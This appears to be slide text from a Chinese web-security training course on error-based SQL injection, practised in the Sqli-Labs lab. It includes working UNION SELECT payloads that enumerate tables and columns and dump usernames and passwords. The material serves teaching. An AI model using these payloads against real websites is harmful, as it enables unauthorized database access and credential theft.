2018Web攻防训练营基于报错的SQL注入1.SQL注入的分类2.GET基于报错的SQL注入发现3.GET基于报错的SQL注入利用4.利用Sqlmap测试课程内容01SQL注入的分类根据注入位置数据类型可将SQL注入分为两类:数字型和字符型。例如:数字型:select*fromtablewhereid=用户输入id例如:字符型:select*fromtablewhereid='用户输入id'02GET基于报错的SQL注入发现实验:Sqli-LabLess1~4,GET基于报错的SQL注入。通过在URL中修改对应的ID值,为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠\来探测URL中是否存在注入点。03GET基于报错的SQL注入利用1、利用orderby判断字段数。2、利用unionselect联合查询,获取表名。0'unionselect1,group_concat(table_name),3frominformation_schema.tableswheretable_schema=database()--+3、利用unionselect联合查询,获取字段名。0'unionselect1,group_concat(column_name),3frominformation_schema.columnswheretable_name='users'--+4、利用unionselect联合查询,获取字段值。0'unionselect1,group_concat(username,0x3a,password),3fromusers--+04利用Sqlmap测试利用Sqlmap进行SQL注入漏洞利用1.SQL注入的分类2.GET基于报错的SQL注入发现3.GET基于报错的SQL注入利用4.利用Sqlmap测试总结再见欢迎关注Web安全训练营课程